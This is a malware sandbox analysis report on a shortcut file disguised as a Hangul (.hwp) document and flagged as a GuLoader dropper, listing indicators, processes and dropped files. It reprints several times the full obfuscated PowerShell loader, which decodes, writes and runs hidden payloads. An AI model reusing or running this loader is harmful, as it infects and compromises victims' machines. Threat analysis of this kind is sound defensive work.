| File name: | 6d901221cb5162c190cce720726889ccb1f8435f5d71fb05614672497425e931 |
| Full analysis: | https://app.any.run/tasks/f75b8a62-ad8e-460a-b75e-3846928e028b |
| Verdict: | Malicious activity |
| Threats: | GuLoader is an advanced downloader written in shellcode. It’s used by criminals to distribute other malware, notably trojans, on a large scale. It’s infamous for using anti-detection and anti-analysis capabilities. |
| Analysis date: | October 15, 2024, 00:51:54 |
| OS: | Windows 10 Professional (build: 19045, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/octet-stream |
| File info: | MS Windows shortcut, Has Description string, Has command line arguments, Icon number=0, ctime=Mon Jan 1 00:00:00 1601, mtime=Mon Jan 1 00:00:00 1601, atime=Mon Jan 1 00:00:00 1601, length=0, window=hidenormalshowminimized |
| MD5: | A4A14A3845EB859FB58E4DC50B6407DD |
| SHA1: | 5FF1E26FD5626EB5CA65FB85F7F04EAF52E628C7 |
| SHA256: | 11C1947DE6A4BAD7C3C5B4A9A6870E2FB01BAC076C5AEBB4987060A9E133B3A3 |
| SSDEEP: | 6144:528/i5ppZHX905tJkLmk6S9QsW7yT3xCv7jLvcZbyV:KFtALk6ijGGMv7IbyV |
MALICIOUS
Detected an obfuscated command line used with Guloader
- powershell.exe (PID: 6712)
- powershell.exe (PID: 1336)
Run PowerShell with an invisible window
- powershell.exe (PID: 6712)
- powershell.exe (PID: 1336)
SUSPICIOUS
Starts POWERSHELL.EXE for commands execution
- cmd.exe (PID: 6696)
- cmd.exe (PID: 6404)
Probably obfuscated PowerShell command line is found
- cmd.exe (PID: 6696)
- cmd.exe (PID: 6404)
Unpacks CAB file
- expand.exe (PID: 7060)
- expand.exe (PID: 6708)
Likely accesses (executes) a file from the Public directory
- expand.exe (PID: 7060)
- expand.exe (PID: 6708)
Manipulates environment variables
- powershell.exe (PID: 6712)
- powershell.exe (PID: 1336)
INFO
Manual execution by a user
- cmd.exe (PID: 6404)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
TRiD
| .lnk | | | Windows Shortcut (100) |
|---|
EXIF
LNK
| Flags: | Description, CommandArgs, IconFile, Unicode, ExpString, PreferEnvPath |
|---|---|
| FileAttributes: | (none) |
| TargetFileSize: | - |
| IconIndex: | (none) |
| RunWindow: | Show Minimized No Activate |
| HotKey: | (none) |
| Description: | hwp File |
| CommandLineArguments: | /c p^owe^rshe^l^l -windowstyle hidden function qrimnpVhAd{param($ByimtbmyEg,$kNeZQMhNGyPy,$EgbvteukmW,$HziPgoYBSPP,$LnMqRSoGrHUl);^<#remandment manifoldly#^> $GwkiDUHMjE=New-Object ^<#rashbuss unwinnable#^>System.IO.FileStream($ByimtbmyEg,^<#pachomian stremmas#^>[System.IO.FileMode]::Open,^<#snugify coordinateness#^>[System.IO.FileAccess]::Read);^<#stylet enomotarch#^> $GwkiDUHMjE.Seek($kNeZQMhNGyPy,^<#pentactinal amble#^>[System.IO.SeekOrigin]::Begin);^<#predisadvantage anisocratic#^> $cKTwlnwsNcq=New-Object ^<#unseducible nonperpendicularity#^>byte[] $EgbvteukmW;^<#coronadite spiraloid#^> $GwkiDUHMjE.Read($cKTwlnwsNcq,^<#uniformest ankylurethria#^>0,$EgbvteukmW);^<#tablespoonful tracking#^> $GwkiDUHMjE.Close();for($FOalSAHFmDqf=0;$FOalSAHFmDqf -lt $EgbvteukmW;$FOalSAHFmDqf++){$cKTwlnwsNcq[$FOalSAHFmDqf]=$cKTwlnwsNcq[$FOalSAHFmDqf] -bxor $HziPgoYBSPP;}sc ^<#aureoled herodiones#^> $LnMqRSoGrHUl ^<#gelidium mutualized#^> $cKTwlnwsNcq -Encoding ^<#teliosporiferous nonjurying#^> Byte;};function sITqPCecquhp{param($XufbRmnzTCYI);^<#txt splenectama#^> $OWiCCpWxFZLj=Get-ChildItem ^<#invigilator pastiness#^>-Path ^<#humified flocculant#^> $XufbRmnzTCYI -Recurse ^<#overlaness satellite#^>*.lnk ^<#pomster hitlerism#^>^| ^<#sailyard ideologue#^>where-object ^<#stotterel sinkable#^>{$_.length ^<#serbonian prenominated#^>-eq 0x0349AE4F} ^<#indemonstrability oralogist#^>^| Select-Object ^<#electrobrasser flambage#^>-ExpandProperty ^<#contacted fishhouse#^>FullName; return ^<#orhamwood countertouch#^> $OWiCCpWxFZLj;^<#zoophysical provingly#^>};$qEHFgOjaYnK=Get-Location;$qkoFVypQqMha=sITqPCecquhp ^<#uncriticism oglers#^>-XufbRmnzTCYI ^<#breakage noncarbonate#^> $qEHFgOjaYnK;if($qkoFVypQqMha.length^<#macroscopical crosshatch#^> -eq 0){$qkoFVypQqMha=sITqPCecquhp ^<#cosmo subheadings#^> -XufbRmnzTCYI $env:Temp;} $qEHFgOjaYnK=Split-Path ^<#overmelted overdiluting#^> $qkoFVypQqMha;$TvRfwPBxWW = $qkoFVypQqMha.substring(0,$qkoFVypQqMha.length-4) ^<#pharmacosiderite antimasker#^>+ '';qrimnpVhAd -ByimtbmyEg ^<#dextrotartaric sarcococca#^> $qkoFVypQqMha -kNeZQMhNGyPy ^<#trochars modelist#^> 0x00001E76 -EgbvteukmW 0x00011A00 -HziPgoYBSPP ^<#uncongestive achieve#^> 0x18 -LnMqRSoGrHUl ^<#visaing aglaozonia#^> $TvRfwPBxWW;^&^<#symplesite lysis#^> $TvRfwPBxWW;$pARWiRFyWslt=$env:public ^<#underpriced colligible#^>+ '\' ^<#hunger uncovers#^>+^<#superhelix imprudent#^> 'Byimtb.cab';qrimnpVhAd -ByimtbmyEg ^<#picturedom yieldable#^> $qkoFVypQqMha -kNeZQMhNGyPy ^<#commutable irrelevancies#^> 0x00013876 -EgbvteukmW ^<#uneviscerated moorman#^> 0x00013CDB -HziPgoYBSPP ^<#waterworm hubba#^> 0xC0 -LnMqRSoGrHUl ^<#unmaudlinly inculpatory#^> $pARWiRFyWslt;Remove-Item -Path ^<#egracias underproduction#^> $qkoFVypQqMha -Force;expand $pARWiRFyWslt ^<#thomistical noster#^> -F:* ^<#auger involucred#^> ($env:public ^<#punting capita#^>+^<#definitions coalescent#^> '\' ^<#moneymakers doggrelize#^>+^<#hicks antirestoration#^> 'documents');remove-item ^<#acieration impracticalness#^> -path ^<#supernaturalised shielings#^> $pARWiRFyWslt ^<#cassius starosty#^>-force;$TdtCmdVzpdm=$env:public^<#caprin utopists#^>+'\documents\start.vbs';^&^<#fatherkin unflared#^> $TdtCmdVzpdm; |
| IconFileName: | .hwp |
Total processes
128
Monitored processes
8
Malicious processes
2
Suspicious processes
2
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 1336 | powershell -windowstyle hidden function qrimnpVhAd{param($ByimtbmyEg,$kNeZQMhNGyPy,$EgbvteukmW,$HziPgoYBSPP,$LnMqRSoGrHUl);<#remandment manifoldly#> $GwkiDUHMjE=New-Object <#rashbuss unwinnable#>System.IO.FileStream($ByimtbmyEg,<#pachomian stremmas#>[System.IO.FileMode]::Open,<#snugify coordinateness#>[System.IO.FileAccess]::Read);<#stylet enomotarch#> $GwkiDUHMjE.Seek($kNeZQMhNGyPy,<#pentactinal amble#>[System.IO.SeekOrigin]::Begin);<#predisadvantage anisocratic#> $cKTwlnwsNcq=New-Object <#unseducible nonperpendicularity#>byte[] $EgbvteukmW;<#coronadite spiraloid#> $GwkiDUHMjE.Read($cKTwlnwsNcq,<#uniformest ankylurethria#>0,$EgbvteukmW);<#tablespoonful tracking#> $GwkiDUHMjE.Close();for($FOalSAHFmDqf=0;$FOalSAHFmDqf -lt $EgbvteukmW;$FOalSAHFmDqf++){$cKTwlnwsNcq[$FOalSAHFmDqf]=$cKTwlnwsNcq[$FOalSAHFmDqf] -bxor $HziPgoYBSPP;}sc <#aureoled herodiones#> $LnMqRSoGrHUl <#gelidium mutualized#> $cKTwlnwsNcq -Encoding <#teliosporiferous nonjurying#> Byte;};function sITqPCecquhp{param($XufbRmnzTCYI);<#txt splenectama#> $OWiCCpWxFZLj=Get-ChildItem <#invigilator pastiness#>-Path <#humified flocculant#> $XufbRmnzTCYI -Recurse <#overlaness satellite#>*.lnk <#pomster hitlerism#>| <#sailyard ideologue#>where-object <#stotterel sinkable#>{$_.length <#serbonian prenominated#>-eq 0x0349AE4F} <#indemonstrability oralogist#>| Select-Object <#electrobrasser flambage#>-ExpandProperty <#contacted fishhouse#>FullName; return <#orhamwood countertouch#> $OWiCCpWxFZLj;<#zoophysical provingly#>};$qEHFgOjaYnK=Get-Location;$qkoFVypQqMha=sITqPCecquhp <#uncriticism oglers#>-XufbRmnzTCYI <#breakage noncarbonate#> $qEHFgOjaYnK;if($qkoFVypQqMha.length<#macroscopical crosshatch#> -eq 0){$qkoFVypQqMha=sITqPCecquhp <#cosmo subheadings#> -XufbRmnzTCYI $env:Temp;} $qEHFgOjaYnK=Split-Path <#overmelted overdiluting#> $qkoFVypQqMha;$TvRfwPBxWW = $qkoFVypQqMha.substring(0,$qkoFVypQqMha.length-4) <#pharmacosiderite antimasker#>+ '';qrimnpVhAd -ByimtbmyEg <#dextrotartaric sarcococca#> $qkoFVypQqMha -kNeZQMhNGyPy <#trochars modelist#> 0x00001E76 -EgbvteukmW 0x00011A00 -HziPgoYBSPP <#uncongestive achieve#> 0x18 -LnMqRSoGrHUl <#visaing aglaozonia#> $TvRfwPBxWW;&<#symplesite lysis#> $TvRfwPBxWW;$pARWiRFyWslt=$env:public <#underpriced colligible#>+ '\' <#hunger uncovers#>+<#superhelix imprudent#> 'Byimtb.cab';qrimnpVhAd -ByimtbmyEg <#picturedom yieldable#> $qkoFVypQqMha -kNeZQMhNGyPy <#commutable irrelevancies#> 0x00013876 -EgbvteukmW <#uneviscerated moorman#> 0x00013CDB -HziPgoYBSPP <#waterworm hubba#> 0xC0 -LnMqRSoGrHUl <#unmaudlinly inculpatory#> $pARWiRFyWslt;Remove-Item -Path <#egracias underproduction#> $qkoFVypQqMha -Force;expand $pARWiRFyWslt <#thomistical noster#> -F:* <#auger involucred#> ($env:public <#punting capita#>+<#definitions coalescent#> '\' <#moneymakers doggrelize#>+<#hicks antirestoration#> 'documents');remove-item <#acieration impracticalness#> -path <#supernaturalised shielings#> $pARWiRFyWslt <#cassius starosty#>-force;$TdtCmdVzpdm=$env:public<#caprin utopists#>+'\documents\start.vbs';&<#fatherkin unflared#> $TdtCmdVzpdm; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 3028 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6404 | "C:\WINDOWS\system32\cmd.exe" /c p^owe^rshe^l^l -windowstyle hidden function qrimnpVhAd{param($ByimtbmyEg,$kNeZQMhNGyPy,$EgbvteukmW,$HziPgoYBSPP,$LnMqRSoGrHUl);^<#remandment manifoldly#^> $GwkiDUHMjE=New-Object ^<#rashbuss unwinnable#^>System.IO.FileStream($ByimtbmyEg,^<#pachomian stremmas#^>[System.IO.FileMode]::Open,^<#snugify coordinateness#^>[System.IO.FileAccess]::Read);^<#stylet enomotarch#^> $GwkiDUHMjE.Seek($kNeZQMhNGyPy,^<#pentactinal amble#^>[System.IO.SeekOrigin]::Begin);^<#predisadvantage anisocratic#^> $cKTwlnwsNcq=New-Object ^<#unseducible nonperpendicularity#^>byte[] $EgbvteukmW;^<#coronadite spiraloid#^> $GwkiDUHMjE.Read($cKTwlnwsNcq,^<#uniformest ankylurethria#^>0,$EgbvteukmW);^<#tablespoonful tracking#^> $GwkiDUHMjE.Close();for($FOalSAHFmDqf=0;$FOalSAHFmDqf -lt $EgbvteukmW;$FOalSAHFmDqf++){$cKTwlnwsNcq[$FOalSAHFmDqf]=$cKTwlnwsNcq[$FOalSAHFmDqf] -bxor $HziPgoYBSPP;}sc ^<#aureoled herodiones#^> $LnMqRSoGrHUl ^<#gelidium mutualized#^> $cKTwlnwsNcq -Encoding ^<#teliosporiferous nonjurying#^> Byte;};function sITqPCecquhp{param($XufbRmnzTCYI);^<#txt splenectama#^> $OWiCCpWxFZLj=Get-ChildItem ^<#invigilator pastiness#^>-Path ^<#humified flocculant#^> $XufbRmnzTCYI -Recurse ^<#overlaness satellite#^>*.lnk ^<#pomster hitlerism#^>^| ^<#sailyard ideologue#^>where-object ^<#stotterel sinkable#^>{$_.length ^<#serbonian prenominated#^>-eq 0x0349AE4F} ^<#indemonstrability oralogist#^>^| Select-Object ^<#electrobrasser flambage#^>-ExpandProperty ^<#contacted fishhouse#^>FullName; return ^<#orhamwood countertouch#^> $OWiCCpWxFZLj;^<#zoophysical provingly#^>};$qEHFgOjaYnK=Get-Location;$qkoFVypQqMha=sITqPCecquhp ^<#uncriticism oglers#^>-XufbRmnzTCYI ^<#breakage noncarbonate#^> $qEHFgOjaYnK;if($qkoFVypQqMha.length^<#macroscopical crosshatch#^> -eq 0){$qkoFVypQqMha=sITqPCecquhp ^<#cosmo subheadings#^> -XufbRmnzTCYI $env:Temp;} $qEHFgOjaYnK=Split-Path ^<#overmelted overdiluting#^> $qkoFVypQqMha;$TvRfwPBxWW = $qkoFVypQqMha.substring(0,$qkoFVypQqMha.length-4) ^<#pharmacosiderite antimasker#^>+ '';qrimnpVhAd -ByimtbmyEg ^<#dextrotartaric sarcococca#^> $qkoFVypQqMha -kNeZQMhNGyPy ^<#trochars modelist#^> 0x00001E76 -EgbvteukmW 0x00011A00 -HziPgoYBSPP ^<#uncongestive achieve#^> 0x18 -LnMqRSoGrHUl ^<#visaing aglaozonia#^> $TvRfwPBxWW;^&^<#symplesite lysis#^> $TvRfwPBxWW;$pARWiRFyWslt=$env:public ^<#underpriced colligible#^>+ '\' ^<#hunger uncovers#^>+^<#superhelix imprudent#^> 'Byimtb.cab';qrimnpVhAd -ByimtbmyEg ^<#picturedom yieldable#^> $qkoFVypQqMha -kNeZQMhNGyPy ^<#commutable irrelevancies#^> 0x00013876 -EgbvteukmW ^<#uneviscerated moorman#^> 0x00013CDB -HziPgoYBSPP ^<#waterworm hubba#^> 0xC0 -LnMqRSoGrHUl ^<#unmaudlinly inculpatory#^> $pARWiRFyWslt;Remove-Item -Path ^<#egracias underproduction#^> $qkoFVypQqMha -Force;expand $pARWiRFyWslt ^<#thomistical noster#^> -F:* ^<#auger involucred#^> ($env:public ^<#punting capita#^>+^<#definitions coalescent#^> '\' ^<#moneymakers doggrelize#^>+^<#hicks antirestoration#^> 'documents');remove-item ^<#acieration impracticalness#^> -path ^<#supernaturalised shielings#^> $pARWiRFyWslt ^<#cassius starosty#^>-force;$TdtCmdVzpdm=$env:public^<#caprin utopists#^>+'\documents\start.vbs';^&^<#fatherkin unflared#^> $TdtCmdVzpdm; | C:\Windows\System32\cmd.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6668 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6696 | "C:\WINDOWS\system32\cmd.exe" /c p^owe^rshe^l^l -windowstyle hidden function qrimnpVhAd{param($ByimtbmyEg,$kNeZQMhNGyPy,$EgbvteukmW,$HziPgoYBSPP,$LnMqRSoGrHUl);^<#remandment manifoldly#^> $GwkiDUHMjE=New-Object ^<#rashbuss unwinnable#^>System.IO.FileStream($ByimtbmyEg,^<#pachomian stremmas#^>[System.IO.FileMode]::Open,^<#snugify coordinateness#^>[System.IO.FileAccess]::Read);^<#stylet enomotarch#^> $GwkiDUHMjE.Seek($kNeZQMhNGyPy,^<#pentactinal amble#^>[System.IO.SeekOrigin]::Begin);^<#predisadvantage anisocratic#^> $cKTwlnwsNcq=New-Object ^<#unseducible nonperpendicularity#^>byte[] $EgbvteukmW;^<#coronadite spiraloid#^> $GwkiDUHMjE.Read($cKTwlnwsNcq,^<#uniformest ankylurethria#^>0,$EgbvteukmW);^<#tablespoonful tracking#^> $GwkiDUHMjE.Close();for($FOalSAHFmDqf=0;$FOalSAHFmDqf -lt $EgbvteukmW;$FOalSAHFmDqf++){$cKTwlnwsNcq[$FOalSAHFmDqf]=$cKTwlnwsNcq[$FOalSAHFmDqf] -bxor $HziPgoYBSPP;}sc ^<#aureoled herodiones#^> $LnMqRSoGrHUl ^<#gelidium mutualized#^> $cKTwlnwsNcq -Encoding ^<#teliosporiferous nonjurying#^> Byte;};function sITqPCecquhp{param($XufbRmnzTCYI);^<#txt splenectama#^> $OWiCCpWxFZLj=Get-ChildItem ^<#invigilator pastiness#^>-Path ^<#humified flocculant#^> $XufbRmnzTCYI -Recurse ^<#overlaness satellite#^>*.lnk ^<#pomster hitlerism#^>^| ^<#sailyard ideologue#^>where-object ^<#stotterel sinkable#^>{$_.length ^<#serbonian prenominated#^>-eq 0x0349AE4F} ^<#indemonstrability oralogist#^>^| Select-Object ^<#electrobrasser flambage#^>-ExpandProperty ^<#contacted fishhouse#^>FullName; return ^<#orhamwood countertouch#^> $OWiCCpWxFZLj;^<#zoophysical provingly#^>};$qEHFgOjaYnK=Get-Location;$qkoFVypQqMha=sITqPCecquhp ^<#uncriticism oglers#^>-XufbRmnzTCYI ^<#breakage noncarbonate#^> $qEHFgOjaYnK;if($qkoFVypQqMha.length^<#macroscopical crosshatch#^> -eq 0){$qkoFVypQqMha=sITqPCecquhp ^<#cosmo subheadings#^> -XufbRmnzTCYI $env:Temp;} $qEHFgOjaYnK=Split-Path ^<#overmelted overdiluting#^> $qkoFVypQqMha;$TvRfwPBxWW = $qkoFVypQqMha.substring(0,$qkoFVypQqMha.length-4) ^<#pharmacosiderite antimasker#^>+ '';qrimnpVhAd -ByimtbmyEg ^<#dextrotartaric sarcococca#^> $qkoFVypQqMha -kNeZQMhNGyPy ^<#trochars modelist#^> 0x00001E76 -EgbvteukmW 0x00011A00 -HziPgoYBSPP ^<#uncongestive achieve#^> 0x18 -LnMqRSoGrHUl ^<#visaing aglaozonia#^> $TvRfwPBxWW;^&^<#symplesite lysis#^> $TvRfwPBxWW;$pARWiRFyWslt=$env:public ^<#underpriced colligible#^>+ '\' ^<#hunger uncovers#^>+^<#superhelix imprudent#^> 'Byimtb.cab';qrimnpVhAd -ByimtbmyEg ^<#picturedom yieldable#^> $qkoFVypQqMha -kNeZQMhNGyPy ^<#commutable irrelevancies#^> 0x00013876 -EgbvteukmW ^<#uneviscerated moorman#^> 0x00013CDB -HziPgoYBSPP ^<#waterworm hubba#^> 0xC0 -LnMqRSoGrHUl ^<#unmaudlinly inculpatory#^> $pARWiRFyWslt;Remove-Item -Path ^<#egracias underproduction#^> $qkoFVypQqMha -Force;expand $pARWiRFyWslt ^<#thomistical noster#^> -F:* ^<#auger involucred#^> ($env:public ^<#punting capita#^>+^<#definitions coalescent#^> '\' ^<#moneymakers doggrelize#^>+^<#hicks antirestoration#^> 'documents');remove-item ^<#acieration impracticalness#^> -path ^<#supernaturalised shielings#^> $pARWiRFyWslt ^<#cassius starosty#^>-force;$TdtCmdVzpdm=$env:public^<#caprin utopists#^>+'\documents\start.vbs';^&^<#fatherkin unflared#^> $TdtCmdVzpdm; | C:\Windows\System32\cmd.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6708 | "C:\WINDOWS\system32\expand.exe" C:\Users\Public\Byimtb.cab -F:* C:\Users\Public\documents | C:\Windows\System32\expand.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: LZ Expansion Utility Exit code: 0 Version: 5.00 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6712 | powershell -windowstyle hidden function qrimnpVhAd{param($ByimtbmyEg,$kNeZQMhNGyPy,$EgbvteukmW,$HziPgoYBSPP,$LnMqRSoGrHUl);<#remandment manifoldly#> $GwkiDUHMjE=New-Object <#rashbuss unwinnable#>System.IO.FileStream($ByimtbmyEg,<#pachomian stremmas#>[System.IO.FileMode]::Open,<#snugify coordinateness#>[System.IO.FileAccess]::Read);<#stylet enomotarch#> $GwkiDUHMjE.Seek($kNeZQMhNGyPy,<#pentactinal amble#>[System.IO.SeekOrigin]::Begin);<#predisadvantage anisocratic#> $cKTwlnwsNcq=New-Object <#unseducible nonperpendicularity#>byte[] $EgbvteukmW;<#coronadite spiraloid#> $GwkiDUHMjE.Read($cKTwlnwsNcq,<#uniformest ankylurethria#>0,$EgbvteukmW);<#tablespoonful tracking#> $GwkiDUHMjE.Close();for($FOalSAHFmDqf=0;$FOalSAHFmDqf -lt $EgbvteukmW;$FOalSAHFmDqf++){$cKTwlnwsNcq[$FOalSAHFmDqf]=$cKTwlnwsNcq[$FOalSAHFmDqf] -bxor $HziPgoYBSPP;}sc <#aureoled herodiones#> $LnMqRSoGrHUl <#gelidium mutualized#> $cKTwlnwsNcq -Encoding <#teliosporiferous nonjurying#> Byte;};function sITqPCecquhp{param($XufbRmnzTCYI);<#txt splenectama#> $OWiCCpWxFZLj=Get-ChildItem <#invigilator pastiness#>-Path <#humified flocculant#> $XufbRmnzTCYI -Recurse <#overlaness satellite#>*.lnk <#pomster hitlerism#>| <#sailyard ideologue#>where-object <#stotterel sinkable#>{$_.length <#serbonian prenominated#>-eq 0x0349AE4F} <#indemonstrability oralogist#>| Select-Object <#electrobrasser flambage#>-ExpandProperty <#contacted fishhouse#>FullName; return <#orhamwood countertouch#> $OWiCCpWxFZLj;<#zoophysical provingly#>};$qEHFgOjaYnK=Get-Location;$qkoFVypQqMha=sITqPCecquhp <#uncriticism oglers#>-XufbRmnzTCYI <#breakage noncarbonate#> $qEHFgOjaYnK;if($qkoFVypQqMha.length<#macroscopical crosshatch#> -eq 0){$qkoFVypQqMha=sITqPCecquhp <#cosmo subheadings#> -XufbRmnzTCYI $env:Temp;} $qEHFgOjaYnK=Split-Path <#overmelted overdiluting#> $qkoFVypQqMha;$TvRfwPBxWW = $qkoFVypQqMha.substring(0,$qkoFVypQqMha.length-4) <#pharmacosiderite antimasker#>+ '';qrimnpVhAd -ByimtbmyEg <#dextrotartaric sarcococca#> $qkoFVypQqMha -kNeZQMhNGyPy <#trochars modelist#> 0x00001E76 -EgbvteukmW 0x00011A00 -HziPgoYBSPP <#uncongestive achieve#> 0x18 -LnMqRSoGrHUl <#visaing aglaozonia#> $TvRfwPBxWW;&<#symplesite lysis#> $TvRfwPBxWW;$pARWiRFyWslt=$env:public <#underpriced colligible#>+ '\' <#hunger uncovers#>+<#superhelix imprudent#> 'Byimtb.cab';qrimnpVhAd -ByimtbmyEg <#picturedom yieldable#> $qkoFVypQqMha -kNeZQMhNGyPy <#commutable irrelevancies#> 0x00013876 -EgbvteukmW <#uneviscerated moorman#> 0x00013CDB -HziPgoYBSPP <#waterworm hubba#> 0xC0 -LnMqRSoGrHUl <#unmaudlinly inculpatory#> $pARWiRFyWslt;Remove-Item -Path <#egracias underproduction#> $qkoFVypQqMha -Force;expand $pARWiRFyWslt <#thomistical noster#> -F:* <#auger involucred#> ($env:public <#punting capita#>+<#definitions coalescent#> '\' <#moneymakers doggrelize#>+<#hicks antirestoration#> 'documents');remove-item <#acieration impracticalness#> -path <#supernaturalised shielings#> $pARWiRFyWslt <#cassius starosty#>-force;$TdtCmdVzpdm=$env:public<#caprin utopists#>+'\documents\start.vbs';&<#fatherkin unflared#> $TdtCmdVzpdm; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 7060 | "C:\WINDOWS\system32\expand.exe" C:\Users\Public\Byimtb.cab -F:* C:\Users\Public\documents | C:\Windows\System32\expand.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: LZ Expansion Utility Exit code: 0 Version: 5.00 (WinBuild.160101.0800) Modules
| |||||||||||||||
Total events
8 556
Read events
8 556
Write events
0
Delete events
0
Modification events
Executable files
0
Suspicious files
1
Text files
7
Unknown types
0
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 1336 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_j1etymgq.41x.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 6712 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | binary | |
MD5:CA7DB8FD88E3D920A0274FF7B9F0023E | SHA256:4F411D3BD5A7415A42C3818E083FE8C4839C6608CAD0A2FFD096CB03A7D5AE78 | |||
| 6712 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_0xtkx5wm.shq.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 6712 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_u1ye5m4u.gvf.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 1336 | powershell.exe | C:\Users\Public\Byimtb.cab | text | |
MD5:4CEF02F8AD2313769B94A5D94C1D264F | SHA256:2DB3025D97642FE7E305BBDF7D11CFCD507B4863D2EB173A856C5A4378E13BC2 | |||
| 7060 | expand.exe | C:\Users\Public\Documents\byimtb.cab | text | |
MD5:4CEF02F8AD2313769B94A5D94C1D264F | SHA256:2DB3025D97642FE7E305BBDF7D11CFCD507B4863D2EB173A856C5A4378E13BC2 | |||
| 1336 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_btf10r31.3my.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 6712 | powershell.exe | C:\Users\Public\Byimtb.cab | text | |
MD5:4CEF02F8AD2313769B94A5D94C1D264F | SHA256:2DB3025D97642FE7E305BBDF7D11CFCD507B4863D2EB173A856C5A4378E13BC2 | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
35
DNS requests
5
Threats
0
HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
6944 | svchost.exe | 52.140.118.28:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IN | whitelisted |
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
— | — | 52.140.118.28:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IN | whitelisted |
— | — | 2.23.209.130:443 | www.bing.com | Akamai International B.V. | GB | whitelisted |
4360 | SearchApp.exe | 2.23.209.187:443 | www.bing.com | Akamai International B.V. | GB | whitelisted |
— | — | 20.106.86.13:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted |
5488 | MoUsoCoreWorker.exe | 20.106.86.13:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted |
4020 | svchost.exe | 239.255.255.250:1900 | — | — | — | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
816 | svchost.exe | 20.106.86.13:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted |
DNS requests
Domain | IP | Reputation |
|---|---|---|
settings-win.data.microsoft.com |
| whitelisted |
www.bing.com |
| whitelisted |
google.com |
| whitelisted |